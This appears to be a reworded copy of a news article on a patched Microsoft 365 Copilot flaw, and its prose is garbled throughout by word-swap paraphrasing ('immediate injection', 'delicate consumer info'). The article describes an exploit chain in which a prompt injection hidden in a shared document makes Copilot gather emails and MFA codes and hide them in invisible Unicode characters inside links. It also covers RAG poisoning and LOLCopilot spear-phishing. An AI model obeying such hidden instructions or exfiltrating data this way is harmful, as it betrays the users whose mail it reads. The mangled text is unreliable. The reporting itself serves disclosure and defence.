Microsoft Fixes ASCII Smuggling Flaw That Enabled Knowledge Theft from Microsoft 365 Copilot

Aug 27, 2024Ravie LakshmananAI Safety / Vulnerability

Particulars have emerged a couple of now-patched vulnerability in Microsoft 365 Copilot that would allow the theft of delicate consumer info utilizing a way referred to as ASCII smuggling.

“ASCII Smuggling is a novel technique that uses special Unicode characters that mirror ASCII but are actually not visible in the user interface,” safety researcher Johann Rehberger mentioned.

“This means that an attacker can have the [large language model] render, to the user, invisible data, and embed them within clickable hyperlinks. This technique basically stages the data for exfiltration!”

Cybersecurity

Your complete assault strings collectively various assault strategies to trend them right into a dependable exploit chain. This consists of the next steps –

  • Set off immediate injection through malicious content material hid in a doc shared on the chat
  • Utilizing a immediate injection payload to instruct Copilot to seek for extra emails and paperwork
  • Leveraging ASCII smuggling to entice the consumer into clicking on a hyperlink to exfiltrate precious information to a third-party server

The online end result of the assault is that delicate information current in emails, together with multi-factor authentication (MFA) codes, might be transmitted to an adversary-controlled server. Microsoft has since addressed the problems following accountable disclosure in January 2024.

The event comes as proof-of-concept (PoC) assaults have been demonstrated in opposition to Microsoft’s Copilot system to control responses, exfiltrate non-public information, and dodge safety protections, as soon as once more highlighting the necessity for monitoring dangers in synthetic intelligence (AI) instruments.

The strategies, detailed by Zenity, enable malicious actors to carry out retrieval-augmented era (RAG) poisoning and oblique immediate injection resulting in distant code execution assaults that may absolutely management Microsoft Copilot and different AI apps. In a hypothetical assault situation, an exterior hacker with code execution capabilities may trick Copilot into offering customers with phishing pages.

Cybersecurity

Maybe one of the vital novel assaults is the power to show the AI right into a spear-phishing machine. The red-teaming method, dubbed LOLCopilot, permits an attacker with entry to a sufferer’s e mail account to ship phishing messages mimicking the compromised customers’ model.

Microsoft has additionally acknowledged that publicly uncovered Copilot bots created utilizing Microsoft Copilot Studio and missing any authentication protections might be an avenue for risk actors to extract delicate info, assuming they’ve prior data of the Copilot title or URL.

“Enterprises should evaluate their risk tolerance and exposure to prevent data leaks from Copilots (formerly Power Virtual Agents), and enable Data Loss Prevention and other security controls accordingly to control creation and publication of Copilots,” Rehberger mentioned.

Discovered this text fascinating? Observe us on Twitter and LinkedIn to learn extra unique content material we put up.

Recent articles